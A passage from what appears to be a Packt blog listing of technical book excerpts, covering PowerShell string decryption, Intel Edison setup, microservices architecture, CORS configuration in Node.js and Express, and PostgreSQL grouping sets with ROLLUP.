tell the class to read the encrypted data from the encryption stream in memory. After creating the CryptoStream, you are ready to read the decrypted data from the CryptoStream. This is done using the IO.StreamReader class. You declare the new-Object cmdlet with the IO.StreamReader class argument, and define the CryptoStream of $cs to read from. At this point, you use try { to catch any error messages that are generated from reading the data in the StreamReader. You call $sr.ReadToEnd(), which calls the StreamReader, reads the complete decrypted value, and places the data in the $result variable.
To stop the reading of data from the CryptoStream and MemoryStream, you close the StreamReader with $sr.Close(), close the CryptoStream with $cs.Close(), and close the memory stream with $ms.Close(). For security purposes, you also clear out the decryptor data by declaring $r.Clear(). If the decryption is successful, you return the value of $result to the script. After defining the decryption function, you call the function for use. You first start by calling Decrypt-String followed by "hK7GHaDD1FxknHu03TYAPxbFAAZeJ6KTSHlnSCPpJ7c=". You also declare the second argument as the password for the decryptor, which is "A_Complex_Password_With_A_Lot_Of_Characters". After execution, you will receive the decrypted value of "Encrypt This String" generated from the function. Summary In this article, we learned about RijndaelManaged 256-bit encryption. We first started with the basics of the encryption process. Then, we proceeded to learn how to create randomized salt, init, and password values in scripts. We ended the article by learning how to encrypt and decrypt strings. Resources for Article: Further resources on this subject: WLAN Encryption Flaws [article] Introducing PowerShell Remoting [article] SQL Server with PowerShell [article]
Packt
21 Jun 2017
8 min read

Setting up Intel Edison

In this article by Avirup Basu, the author of the book Intel Edison Projects, we will be covering the following topics: Setting up the Intel Edison Setting up the developer environment (For more resources related to this topic, see here.) In every Internet of Things (IoT) or robotics project, we have a controller that is the brain of the entire system; here, that controller is the Intel Edison. The Intel Edison computing module comes in two different packages: one is a mini breakout board, and the other is an Arduino-compatible board. You can use the board in its native state as well, but in that case you have to fabricate your own expansion board. The Edison is basically the size of an SD card. Due to its tiny size, it's perfect for wearable devices. However, its capabilities make it suitable for IoT applications, and above all, its powerful processing capability makes it suitable for robotics applications. However, we don't simply use the device in this state; we hook up the board with an expansion board. The expansion board provides the user with enough flexibility and compatibility for interfacing with other units. The Edison has an operating system that runs the entire system: a Linux image. Thus, to set up your device, you initially need to configure your device both at the hardware and the software level. Initial hardware setup We'll concentrate on the Edison package that comes with an Arduino expansion board. Initially you will get two different pieces: The Intel® Edison board The Arduino expansion board The following is the architecture of the device: Architecture of Intel Edison. Picture credits: https://software.intel.com/en-us/ We need to hook these two pieces up into a single unit. Place the Edison board on top of the expansion board such that the GPIO interfaces meet at a single point. Gently push the Edison against the expansion board; you will hear a click. Use the screws that come with the package to tighten the setup.
Once this is done, we'll set up the device at both the hardware and the software level to be used further. Following are the steps we'll cover in detail: Downloading necessary software packages Connecting your Intel® Edison to your PC Flashing your device with the Linux image Connecting to a Wi-Fi network SSH-ing into your Intel® Edison device Downloading necessary software packages To move forward with development on this platform, we need to download and install a couple of pieces of software, which include the drivers and the IDEs. Following is the list of the software along with the links where they can be found: Intel® Platform Flash Tool Lite (https://01.org/android-ia/downloads/intel-platform-flash-tool-lite) PuTTY (http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html) Intel XDK for IoT (https://software.intel.com/en-us/intel-xdk) Arduino IDE (https://www.arduino.cc/en/Main/Software) FileZilla FTP client (https://filezilla-project.org/download.php) Notepad++ or any other editor (https://notepad-plus-plus.org/download/v7.3.html) Drivers and miscellaneous downloads Latest Yocto* Poky image Windows standalone driver for Intel Edison FTDI drivers (http://www.ftdichip.com/Drivers/VCP.htm) The first and the second packages can be downloaded from (https://software.intel.com/en-us/iot/hardware/edison/downloads) Plugging in your device After all the software and driver installations, we'll now connect the device to a PC. You need two Micro-B USB cables to connect your device to the PC. You can also use a 9V power adapter and a single Micro-B USB cable, but for now we will not use the power adapter: Different sections of the Arduino expansion board of Intel Edison A small switch exists between the USB port and the OTG port. This switch must be toward the OTG port, because we're going to power the device from the OTG port and not through the DC power port. Once it is connected to your PC, open your device manager and expand the ports section.
If all the driver installations were successful, then you must see two ports: Intel Edison virtual com port USB serial port Flashing your device Once your device is successfully detected and installed, you need to flash your device with the Linux image. For this we'll use the flash tool provided by Intel: Open the flash lite tool and connect your device to the PC: Intel Phone Flash Lite tool Once the flash tool is opened, click on Browse... and browse to the .zip file of the Linux image you have downloaded. After you click on OK, the tool will automatically unzip the file. Next, click on Start to flash: Intel® Phone Flash Lite tool – stage 1 You will be asked to disconnect and reconnect your device. Do as the tool says, and the board should start flashing. It may take some time before the flashing is completed. You are requested not to tamper with the device during the process. Once the flashing is completed, we'll configure the device: Intel® Phone Flash Lite tool – complete Configuring the device After flashing completes successfully, we'll now configure the device. We're going to use the PuTTY console for the configuration. PuTTY is an SSH and telnet client, developed originally by Simon Tatham for the Windows platform. We're going to use the serial section here. Before opening the PuTTY console: Open up the device manager and note the port number for the USB serial port. This will be used in your PuTTY console: Ports for Intel® Edison in PuTTY Next, select Serial on the PuTTY console and enter the port number. Use a baud rate of 115200. Press Open to open the window for communicating with the device: PuTTY console – login screen Once you are in the PuTTY console, you can execute commands to configure your Edison. Following is the set of tasks we'll do in the console to configure the device: Provide your device a name Provide a root password (SSH your device) Connect your device to Wi-Fi Initially, when in the console, you will be asked to log in. Type in root and press Enter.
Once entered, you will see root@edison, which means that you are in the root directory: PuTTY console – login success Now we are in the Linux terminal of the device. Firstly, we'll enter the following command for setup: configure_edison --setup Press Enter after entering the command, and the entire configuration will be fairly straightforward: PuTTY console – set password Firstly, you will be asked to set a password. Type in a password and press Enter. You need to type in your password again for confirmation. Next, we'll set up a name for the device: PuTTY console – set name Give a name to your device. Please note that this is not the login name for your device; it's just an alias for your device. Also, the name should be at least 5 characters long. Once you've entered the name, it will ask for confirmation; press y to confirm. Then it will ask you to set up Wi-Fi. Again, select y to continue. It's not mandatory to set up Wi-Fi, but it's recommended. We need the Wi-Fi for file transfer, downloading packages, and so on: PuTTY console – set Wi-Fi Once the scanning is completed, we'll get a list of available networks. Select the number corresponding to your network and press Enter. In this case it is 5, which corresponds to avirup171, my Wi-Fi network. Enter the network credentials. After you do that, your device will get connected to the Wi-Fi. You should get an IP address after your device is connected: PuTTY console – set Wi-Fi - 2 After a successful connection you should get this screen. Make sure your PC is connected to the same network. Open up the browser on your PC, and enter the IP address mentioned in the console. You should get a screen similar to this: Wi-Fi setup – completed Now we are done with the initial setup. However, Wi-Fi setup normally doesn't happen in one go. Sometimes your device doesn't get connected to the Wi-Fi, and sometimes you may not get the page shown before. In those cases, you need to start wpa_cli to manually configure the Wi-Fi.
Refer to the following link for the details: http://www.intel.com/content/www/us/en/support/boards-and-kits/000006202.html Summary In this article, we covered the initial setup of the Intel Edison and how to connect it to a network. We have also covered how to transfer files to the Edison and vice versa. Resources for Article: Further resources on this subject: Getting Started with Intel Galileo [article] Creating Basic Artificial Intelligence [article] Using IntelliTrace to Diagnose Problems with a Hosted Service [article]

Packt
20 Jun 2017
12 min read

What are Microservices?

In this article written by Gaurav Kumar Aroraa, Lalit Kale, Kanwar Manish, authors of the book Building Microservices with .NET Core, we will start with a brief introduction. Then, we will define its predecessors: monolithic architecture and service-oriented architecture (SOA). After this, we will see how microservices fare against both SOA and the monolithic architecture. We will then compare the advantages and disadvantages of each one of these architectural styles. This will enable us to identify the right scenario for these styles. We will understand the problems that arise from having a layered monolithic architecture. We will discuss the solutions available to these problems in the monolithic world. At the end, we will be able to break down a monolithic application into a microservice architecture. We will cover the following topics in this article: Origin of microservices Discussing microservices (For more resources related to this topic, see here.) Origin of microservices The term microservices was used for the first time in mid-2011 at a workshop of software architects. In March 2012, James Lewis presented some of his ideas about microservices. By the end of 2013, various groups from the IT industry started having discussions on microservices, and by 2014, it had become popular enough to be considered a serious contender for large enterprises. There is no official introduction available for microservices. The understanding of the term is purely based on the use cases and discussions held in the past. We will discuss this in detail, but before that, let's check out the definition of microservices as per Wikipedia (https://en.wikipedia.org/wiki/Microservices), which sums it up as: Microservices is a specialization of and implementation approach for SOA used to build flexible, independently deployable software systems. 
In 2014, James Lewis and Martin Fowler came together and provided a few real-world examples and presented microservices (refer to http://martinfowler.com/microservices/) in their own words and further detailed it as follows: The microservice architectural style is an approach to developing a single application as a suite of small services, each running in its own process and communicating with lightweight mechanisms, often an HTTP resource API. These services are built around business capabilities and independently deployable by fully automated deployment machinery. There is a bare minimum of centralized management of these services, which may be written in different programming languages and use different data storage technologies. It is very important that you see all the attributes James and Martin defined here. They defined it as an architectural style that developers could utilize to develop a single application with the business logic spread across a bunch of small services, each having their own persistent storage functionality. Also, note its attributes: it can be independently deployable, can run in its own process, is a lightweight communication mechanism, and can be written in different programming languages. We want to emphasize this specific definition since it is the crux of the whole concept. And as we move along, it will come together by the time we finish this book. Discussing microservices Until now, we have gone through a few definitions of microservices; now, let's discuss microservices in detail. In short, a microservice architecture removes most of the drawbacks of SOA architectures.  Slicing your application into a number of services is neither SOA nor microservices. However, combining service design and best practices from the SOA world along with a few emerging practices, such as isolated deployment, semantic versioning, providing lightweight services, and service discovery in polyglot programming, is microservices. 
We implement microservices to satisfy business features with reduced time to market and greater flexibility. Before we move on to understand the architecture, let's discuss the two important architectures that have led to its existence: The monolithic architecture style SOA Most of us are aware of the scenario: during the life cycle of enterprise application development, a suitable architectural style is decided. Then, at various stages, the initial pattern is further improved and adapted with changes that cater to various challenges, such as deployment complexity, large code base, and scalability issues. This is exactly how the monolithic architecture style evolved into SOA, further leading up to microservices. Monolithic architecture The monolithic architectural style is a traditional architecture type and has been widely used in the industry. The term "monolithic" is not new and is borrowed from the Unix world. In Unix, most of the commands exist as a standalone program whose functionality is not dependent on any other program. As seen in the succeeding image, we can have different components in the application, such as: User interface: This handles all of the user interaction while responding with HTML or JSON or any other preferred data interchange format (in the case of web services). Business logic: All the business rules applied to the input being received in the form of user input, events, and database exist here. Database access: This houses the complete functionality for accessing the database for the purpose of querying and persisting objects. A widely accepted rule is that it is utilized through business modules and never directly through user-facing components. Software built using this architecture is self-contained. We can imagine a single .NET assembly that contains various components, as described in the following image: As the software is self-contained here, its components are interconnected and interdependent.
Even a simple code change in one of the modules may break a major functionality in other modules. This would result in a scenario where we'd need to test the whole application. With the business depending critically on its enterprise application frameworks, this amount of time could prove to be very critical. Having all the components tightly coupled poses another challenge: whenever we execute or compile such software, all the components should be available or the build will fail; refer to the preceding image, which represents a monolithic architecture as a self-contained, single .NET assembly project. However, monolithic architectures might also have multiple assemblies. This means that even though a business layer (assembly, data access layer assembly, and so on) is separated, at run time, all of them will come together and run as one process. The user interface depends on other components, such as direct sale and inventory, just as all the other components depend upon each other. In this scenario, we will not be able to execute this project in the absence of any one of these components. The process of upgrading any one of these components will be more complex, as we may have to consider other components that require code changes too. This results in more development time than required for the actual change. Deploying such an application will become another challenge. During deployment, we will have to make sure that each and every component is deployed properly; otherwise, we may end up facing a lot of issues in our production environments. If we develop an application using the monolithic architecture style, as discussed previously, we might face the following challenges: Large code base: This is a scenario where the code lines outnumber the comments by a great margin. As components are interconnected, we will have to bear with a repetitive code base. Too many business modules: This is in regard to modules within the same system.
Code base complexity: This results in a higher chance of code breaking due to the fix required in other modules or services. Complex code deployment: You may come across minor changes that would require whole system deployment. One module failure affecting the whole system: This is in regard to modules that depend on each other. Scalability: This is required for the entire system and not just the modules in it. Intermodule dependency: This is due to tight coupling. Spiraling development time: This is due to code complexity and interdependency. Inability to easily adapt to a new technology: In this case, the entire system would need to be upgraded. As discussed earlier, if we want to reduce development time, ease deployment, and improve the maintainability of software for enterprise applications, we should avoid the traditional or monolithic architecture. Service-oriented architecture In the previous section, we discussed the monolithic architecture and its limitations. We also discussed why it does not fit into our enterprise application requirements. To overcome these issues, we should go with a modular approach where we can separate the components so that they come out of the self-contained, single .NET assembly. The main difference between SOA and the monolithic architecture is not one assembly versus multiple assemblies; rather, because each service in SOA runs as a separate process, SOA scales better than a monolith. Let's discuss the modular architecture, that is, SOA. This is a famous architectural style in which enterprise applications are designed with a collection of services as their base. These services may be RESTful or ASMX Web services. To understand SOA in more detail, let's discuss "service" first. What is a service? A service, in this case, is an essential concept of SOA. It can be a piece of code, a program, or software that provides some functionality to other system components.
This piece of code can interact directly with the database or indirectly through another service. Furthermore, it can be consumed by clients directly, where the client may be a website, desktop app, mobile app, or any other device app. Refer to the following diagram: Service refers to a type of functionality exposed for consumption by other systems (generally referred to as clients/client applications). As mentioned earlier, it can be represented by a piece of code, program, or software. Such services are exposed over the HTTP transport protocol as a general practice. However, the HTTP protocol is not a limiting factor, and a protocol can be picked as deemed fit for the scenario. In the following image, Service – direct selling is directly interacting with Database, and three different clients, namely Web, Desktop, and Mobile, are consuming the service. On the other hand, we have clients consuming Service – partner selling, which is interacting with Service – channel partners for database access. A product selling service is a set of services that interacts with client applications and provides database access directly or through another service, in this case, Service – Channel partner. In the case of Service – direct selling, shown in the preceding example, it is providing some functionality to a Web Store, a desktop application, and a mobile application. This service is further interacting with the database for various tasks, namely fetching data, persisting data, and so on. Normally, services interact with other systems via some communication channel, generally the HTTP protocol. These services may or may not be deployed on the same server.
It is a possible scenario that instead of the entire business functionality, only a part of it will reside on Server 1 and the remaining on Server 2. Similarly, Service – partner selling appears to have the same arrangement on Server 3 and Server 4. However, that doesn't stop Service – channel partners from being hosted as a complete set on both servers: Server 5 and Server 6. A system that uses one or more services in the fashion shown in the preceding figure is called an SOA. We will discuss SOA in detail in the following sections. Let's recall the monolithic architecture. There, we had to deploy our complete project for any change, since it is a self-contained assembly and all the components are interconnected and interdependent, which also restricts code reusability. After we select SOA (refer to the preceding image and subsequent discussion), this architectural style gives us the benefits of code reusability and easy deployment. Let's examine this in light of the preceding figure: Reusability: Multiple clients can consume the service. The service can also be simultaneously consumed by other services. For example, OrderService is consumed by web and mobile clients. Now, OrderService can also be used by the Reporting Dashboard UI. Stateless: Services do not persist any state between requests from the client; that is, the service doesn't know, nor care, whether the subsequent request has come from the client that has/hasn't made the previous request. Contract-based: Interfaces make it technology-agnostic on both sides of implementation and consumption. It also serves to make it immune to code updates in the underlying functionality. Scalability: A system can be scaled up; SOA can be individually clustered with appropriate load balancing. Upgradation: It is very easy to roll out new functionalities or introduce new versions of the existing functionality.
The system doesn't stop you from keeping multiple versions of the same business functionality. Summary In this article, we discussed what the microservice architectural style is in detail, its history, and how it differs from its predecessors: monolithic and SOA. We further defined the various challenges that monolithic faces when dealing with large systems. Scalability and reusability are some definite advantages that SOA provides over monolithic. We also discussed the limitations of the monolithic architecture, including scaling problems, by implementing a real-life monolithic application. The microservice architecture style resolves all these issues by reducing code interdependency and isolating the dataset size that any one of the microservices works upon. We utilized dependency injection and database refactoring for this. We further explored automation, CI, and deployment. These easily allow the development team to let the business sponsor choose what industry trends to respond to first. This results in cost benefits, better business response, timely technology adoption, effective scaling, and removal of human dependency. Resources for Article: Further resources on this subject: Microservices and Service Oriented Architecture [article] Breaking into Microservices Architecture [article] Microservices – Brave New World [article]

Packt
20 Jun 2017
14 min read

CORS in Node.js

In this article by Randall Goya and Rajesh Gunasundaram, the authors of the book CORS Essentials: Node.js is a cross-platform JavaScript runtime environment that executes JavaScript code on the server side. This enables a unified language across web application development: JavaScript becomes the language that runs on both the client side and the server side. (For more resources related to this topic, see here.) In this article we will learn that: Node.js is a JavaScript platform for developing server-side web applications. Node.js can provide the web server for other frameworks including Express.js, AngularJS, Backbone.js, Ember.js and others. Some other JavaScript frameworks such as ReactJS, Ember.js and Socket.IO may also use Node.js as the web server. Isomorphic JavaScript can add server-side functionality for client-side frameworks. JavaScript frameworks are evolving rapidly. This article reviews some of the current techniques, and syntax specific to some frameworks. Make sure to check the documentation for each project to discover the latest techniques. Once you understand the CORS concepts, you may create your own solution, because JavaScript is a loosely structured language. All the examples are based on the fundamentals of CORS: allowed origin(s), methods, and headers such as Content-Type, and the preflight request that may be required according to the CORS specification. JavaScript frameworks are very popular JavaScript is sometimes called the lingua franca of the Internet, because it is cross-platform and supported by many devices. It is also a loosely structured language, which makes it possible to craft solutions for many types of applications. Sometimes an entire application is built in JavaScript. Frequently, JavaScript provides a client-side front-end for applications built with Symfony, content management systems such as Drupal, and other back-end frameworks.
Node.js is server-side JavaScript and provides a web server as an alternative to Apache, IIS, Nginx and other traditional web servers.

Introduction to Node.js

Node.js is an open-source, cross-platform library that enables the development of server-side web applications. Applications written in JavaScript for Node.js can run on many operating systems, including OS X, Microsoft Windows, Linux, and many others. Node.js provides non-blocking I/O and an event-driven architecture designed to optimize an application's performance and scalability for real-time web applications. The biggest difference between PHP and Node.js is that PHP is a blocking language, where commands execute only after the previous command has completed, while Node.js is a non-blocking language where commands execute in parallel, and use callbacks to signal completion. Node.js can move files, payloads from services, and data asynchronously, without waiting for a command to complete, which improves performance. Most JS frameworks that work with Node.js use the concept of routes to manage pages and other parts of the application. Each route may have its own set of configurations. For example, CORS may be enabled only for a specific page or route. Node.js loads modules for extending functionality via the npm package manager. The developer selects which packages to load with npm, which reduces bloat. The developer community has created a large number of npm packages for specific functions. JXcore is a fork of Node.js targeting mobile devices and IoT (Internet of Things) devices. JXcore can use both Google V8 and Mozilla SpiderMonkey as its JavaScript engine, and can run Node applications on iOS devices using Mozilla SpiderMonkey. MEAN is a popular JavaScript software stack with MongoDB (a NoSQL database), Express.js and AngularJS, all of which run on a Node.js server.
JavaScript frameworks that work with Node.js

Node.js provides a server for other popular JS frameworks, including AngularJS, Express.js, Backbone.js, Socket.IO, and Connect.js. ReactJS was designed to run in the client browser, but it is often combined with a Node.js server. As we shall see in the following descriptions, these frameworks are not necessarily exclusive, and are often combined in applications.

Express.js is a Node.js server framework

Express.js is a Node.js web application server framework, designed for building single-page, multi-page, and hybrid web applications. It is considered the "standard" server framework for Node.js. The package is installed with the command npm install express --save.

AngularJS extends static HTML with dynamic views

HTML was designed for static content, not for dynamic views. AngularJS extends HTML syntax with custom tag attributes. It provides model–view–controller (MVC) and model–view–viewmodel (MVVM) architectures in a front-end client-side framework. AngularJS is often combined with a Node.js server and other JS frameworks. AngularJS runs client-side and Express.js runs on the server, therefore Express.js is considered more secure for functions such as validating user input, which can be tampered with client-side. AngularJS applications can use the Express.js framework to connect to databases, for example in the MEAN stack.

Connect.js provides middleware for Node.js requests

Connect.js is a JavaScript framework providing middleware to handle requests in Node.js applications. Connect.js provides middleware to handle Express.js and cookie sessions, to provide parsers for the HTML body and cookies, to create vhosts (virtual hosts) and error handlers, and to override methods.

Backbone.js often uses a Node.js server

Backbone.js is a JavaScript framework with a RESTful JSON interface and is based on the model–view–presenter (MVP) application design.
It is designed for developing single-page web applications, and for keeping various parts of web applications (for example, multiple clients and the server) synchronized. Backbone depends on Underscore.js, plus jQuery for use of all the available features. Backbone often uses a Node.js server, for example to connect to data storage.

ReactJS handles user interfaces

ReactJS is a JavaScript library for creating user interfaces while addressing challenges encountered in developing single-page applications where data changes over time. React handles the user interface in model–view–controller (MVC) architecture. ReactJS typically runs client-side and can be combined with AngularJS. Although ReactJS was designed to run client-side, it can also be used server-side in conjunction with Node.js. PayPal and Netflix leverage the server-side rendering of ReactJS known as Isomorphic ReactJS. There are React-based add-ons that take care of the server-side parts of a web application.

Socket.IO uses WebSockets for realtime event-driven applications

Socket.IO is a JavaScript library for event-driven web applications using the WebSocket protocol, with realtime, bi-directional communication between web clients and servers. It has two parts: a client-side library that runs in the browser, and a server-side library for Node.js. Although it can be used as simply a wrapper for WebSocket, it provides many more features, including broadcasting to multiple sockets, storing data associated with each client, and asynchronous I/O. Socket.IO provides better security than WebSocket alone, since allowed domains must be specified for its server.

Ember.js can use Node.js

Ember is another popular JavaScript framework with routing that uses Mustache-style templates. It can run on a Node.js server, or also with Express.js. Ember can also be combined with Rack, a component of Ruby on Rails (RoR). Ember Data is a library for modeling data in Ember.js applications.
CORS in Express.js

The following code adds the Access-Control-Allow-Origin and Access-Control-Allow-Headers headers globally to all requests on all routes in an Express.js application. A route is a path in the Express.js application, for example /user for a user page. app.all sets the configuration for all routes in the application. Specific HTTP requests such as GET or POST are handled by app.get and app.post. app.all('*', function(req, res, next) { res.header("Access-Control-Allow-Origin", "*"); res.header("Access-Control-Allow-Headers", "X-Requested-With"); next(); }); app.get('/', function(req, res, next) { // Handle GET for this route }); app.post('/', function(req, res, next) { // Handle the POST for this route }); For better security, consider limiting the allowed origin to a single domain, or adding some additional code to validate or limit the domain(s) that are allowed. Also, consider sending the headers only for routes that require CORS by replacing app.all with a more specific route and method. The following code only sends the CORS headers on a GET request on the route /user, and only allows the request from http://www.localdomain.com. app.get('/user', function(req, res, next) { res.header("Access-Control-Allow-Origin", "http://www.localdomain.com"); res.header("Access-Control-Allow-Headers", "X-Requested-With"); next(); }); Since this is JavaScript code, you may dynamically manage the values of routes, methods, and domains via variables, instead of hard-coding the values.

CORS npm for Express.js using Connect.js middleware

Connect.js provides middleware to handle requests in Express.js. You can use Node Package Manager (npm) to install a package that enables CORS in Express.js with Connect.js: npm install cors The package offers flexible options, which should be familiar from the CORS specification, including using credentials and preflight.
It provides dynamic ways to validate an origin domain using a function or a regular expression, and handler functions to process preflight.

Configuration options for CORS npm

origin: Configures the Access-Control-Allow-Origin CORS header with a string containing the full URL and protocol making the request, for example http://localdomain.com. Possible values for origin: The default value TRUE uses req.header('Origin') to determine the origin and CORS is enabled. When set to FALSE CORS is disabled. It can be set to a function with the request origin as the first parameter and a callback function as the second parameter. It can be a regular expression, for example /localdomain.com$/, or an array of regular expressions and/or strings to match. methods: Sets the Access-Control-Allow-Methods CORS header. Possible values for methods: A comma-delimited string of HTTP methods, for example GET, POST An array of HTTP methods, for example ['GET', 'PUT', 'POST'] allowedHeaders: Sets the Access-Control-Allow-Headers CORS header. Possible values for allowedHeaders: A comma-delimited string of allowed headers, for example 'Content-Type, Authorization' An array of allowed headers, for example ['Content-Type', 'Authorization'] If unspecified, it defaults to the value specified in the request's Access-Control-Request-Headers header exposedHeaders: Sets the Access-Control-Expose-Headers header. Possible values for exposedHeaders: A comma-delimited string of exposed headers, for example 'Content-Range, X-Content-Range' An array of exposed headers, for example ['Content-Range', 'X-Content-Range'] If unspecified, no custom headers are exposed credentials: Sets the Access-Control-Allow-Credentials CORS header. Possible values for credentials: TRUE—passes the header for preflight FALSE or unspecified—omit the header, no preflight maxAge: Sets the Access-Control-Max-Age header.
Possible values for maxAge: An integer number of seconds used as the TTL for caching the preflight response If unspecified, the preflight response is not cached preflightContinue: Passes the CORS preflight response to the next handler. The default configuration without setting any values allows all origins and methods without preflight. Keep in mind that complex CORS requests other than GET, HEAD, POST will fail without preflight, so make sure you enable preflight in the configuration when using them. Without setting any values, the configuration defaults to: { "origin": "*", "methods": "GET,HEAD,PUT,PATCH,POST,DELETE", "preflightContinue": false }

Code examples for CORS npm

These examples demonstrate the flexibility of CORS npm for specific configurations. Note that the express and cors packages are always required.

Enable CORS globally for all origins and all routes

The simplest implementation of CORS npm enables CORS for all origins and all requests. The following example enables CORS for an arbitrary route "/product/:id" for a GET request by telling the entire app to use CORS for all routes: var express = require('express') , cors = require('cors') , app = express(); app.use(cors()); // this tells the app to use CORS for all requests and all routes app.get('/product/:id', function(req, res, next){ res.json({msg: 'CORS is enabled for all origins'}); }); app.listen(80, function(){ console.log('CORS is enabled on the web server listening on port 80'); });

Allow CORS for dynamic origins for a specific route

The following example uses corsOptions to check if the domain making the request is in the whitelisted array with a callback function, which returns null if it doesn't find a match. This CORS option is passed to the route "product/:id" which is the only route that has CORS enabled. The allowed origins can be dynamic by changing the value of the variable "whitelist."
var express = require('express') , cors = require('cors') , app = express(); // define the whitelisted domains and set the CORS options to check them var whitelist = ['http://localdomain.com', 'http://localdomain-other.com']; var corsOptions = { origin: function(origin, callback){ var originWhitelisted = whitelist.indexOf(origin) !== -1; callback(null, originWhitelisted); } }; // add the CORS options to a specific route /product/:id for a GET request app.get('/product/:id', cors(corsOptions), function(req, res, next){ res.json({msg: 'A whitelisted domain matches and CORS is enabled for route product/:id'}); }); // log that CORS is enabled on the server app.listen(80, function(){ console.log('CORS is enabled on the web server listening on port 80'); }); You may set different CORS options for specific routes, or sets of routes, by defining the options assigned to unique variable names, for example "corsUserOptions." Pass the specific configuration variable to each route that requires that set of options.

Enabling CORS preflight

CORS requests that use an HTTP method other than GET, HEAD, POST (for example DELETE), or that use custom headers, are considered complex and require a preflight request before proceeding with the CORS requests.
Enable preflight by adding an OPTIONS handler for the route: var express = require('express') , cors = require('cors') , app = express(); // add the OPTIONS handler app.options('/products/:id', cors()); // options is added to the route /products/:id // use the OPTIONS handler for the DELETE method on the route /products/:id app.del('/products/:id', cors(), function(req, res, next){ res.json({msg: 'CORS is enabled with preflight on the route /products/:id for the DELETE method for all origins!'}); }); app.listen(80, function(){ console.log('CORS is enabled on the web server listening on port 80'); }); Note that app.del is a deprecated alias in Express 4 and later; prefer app.delete. You can enable preflight globally on all routes with the wildcard: app.options('*', cors());

Configuring CORS asynchronously

One of the reasons to use Node.js frameworks is to take advantage of their asynchronous abilities, handling multiple tasks at the same time. Here we use a callback function corsDelegateOptions and add it to the cors parameter passed to the route /products/:id. The callback function can handle multiple requests asynchronously.
var express = require('express') , cors = require('cors') , app = express(); // define the allowed origins stored in a variable var whitelist = ['http://example1.com', 'http://example2.com']; // create the callback function var corsDelegateOptions = function(req, callback){ var corsOptions; if(whitelist.indexOf(req.header('Origin')) !== -1){ corsOptions = { origin: true }; // the requested origin in the CORS response matches and is allowed }else{ corsOptions = { origin: false }; // the requested origin in the CORS response doesn't match, and CORS is disabled for this request } callback(null, corsOptions); // callback expects two parameters: error and options }; // add the callback function to the cors parameter for the route /products/:id for a GET request app.get('/products/:id', cors(corsDelegateOptions), function(req, res, next){ res.json({msg: 'A whitelisted domain matches and CORS is enabled for route product/:id'}); }); app.listen(80, function(){ console.log('CORS is enabled on the web server listening on port 80'); });

Summary

We have learned the essentials of applying CORS in Node.js. Let us have a quick recap of what we have learned: Node.js provides a web server built with JavaScript, and can be combined with many other JS frameworks as the application server. Although some frameworks have specific syntax for implementing CORS, they all follow the CORS specification by specifying allowed origin(s) and method(s). More robust frameworks allow custom headers such as Content-Type, and preflight when required for complex CORS requests. JavaScript frameworks may depend on the jQuery XHR object, which must be configured properly to allow cross-origin requests. JavaScript frameworks are evolving rapidly. The examples here may become outdated. Always refer to the project documentation for up-to-date information.
With knowledge of the CORS specification, you may create your own techniques using JavaScript based on these examples, depending on the specific needs of your application. Resources for Article: Further resources on this subject: An Introduction to Node.js Design Patterns [article] Five common questions for .NET/Java developers learning JavaScript and Node.js [article] API with MongoDB and Node.js [article]
article-image-grouping-sets-advanced-sql
Packt
20 Jun 2017
6 min read
Save for later

Grouping Sets in Advanced SQL

In this article by Hans-Jürgen Schönig, the author of the book Mastering PostgreSQL 9.6, we will learn about advanced SQL.

Introducing grouping sets

Every advanced user of SQL should be familiar with the GROUP BY and HAVING clauses. But are you also aware of CUBE, ROLLUP, and GROUPING SETS? If not, this article might be worth reading for you.

Loading some sample data

To make this article a pleasant experience for you, I have compiled some sample data, which has been taken from the BP energy report at http://www.bp.com/en/global/corporate/energy-economics/statistical-review-of-world-energy.html. Here is the data structure, which will be used: test=# CREATE TABLE t_oil ( region text, country text, year int, production int, consumption int ); CREATE TABLE The test data can be downloaded from our website using curl directly: test=# COPY t_oil FROM PROGRAM 'curl www.cybertec.at/secret/oil_ext.txt'; COPY 644 On some operating systems curl is not there by default or has not been installed, so downloading the file beforehand might be the easier option for many people. Altogether there is data for 14 nations between 1965 and 2010, which are in two regions of the world: test=# SELECT region, avg(production) FROM t_oil GROUP BY region; region | avg ---------------+--------------------- Middle East | 1992.6036866359447005 North America | 4541.3623188405797101 (2 rows)

Applying grouping sets

The GROUP BY clause will turn many rows into one row per group. However, if you do reporting in real life, you might also be interested in the overall average; one additional line might be needed. Here is how this can be achieved: test=# SELECT region, avg(production) FROM t_oil GROUP BY ROLLUP (region); region | avg ---------------+----------------------- Middle East | 1992.6036866359447005 North America | 4541.3623188405797101 | 2607.5139860139860140 (3 rows) The ROLLUP clause will inject an additional line, which will contain the overall average.
If you do reporting, it is highly likely that a summary line will be needed. Instead of running two queries, PostgreSQL can provide the data by running just a single query. Of course this kind of operation can also be used if you are grouping by more than just one column: test=# SELECT region, country, avg(production) FROM t_oil WHERE country IN ('USA', 'Canada', 'Iran', 'Oman') GROUP BY ROLLUP (region, country); region | country | avg ---------------+---------+----------------------- Middle East | Iran | 3631.6956521739130435 Middle East | Oman | 586.4545454545454545 Middle East | | 2142.9111111111111111 North America | Canada | 2123.2173913043478261 North America | USA | 9141.3478260869565217 North America | | 5632.2826086956521739 | | 3906.7692307692307692 (7 rows) In this example, PostgreSQL will inject three lines into the result set: one line for Middle East, one for North America, and on top of that a line for the overall average. If you are building a web application, the current result is ideal because you can easily build a GUI to drill into the result set by filtering out the NULL values. The ROLLUP clause is nice in case you instantly want to display a result. I always used it to display final results to end users. However, if you are doing reporting, you might want to pre-calculate more data to ensure more flexibility.
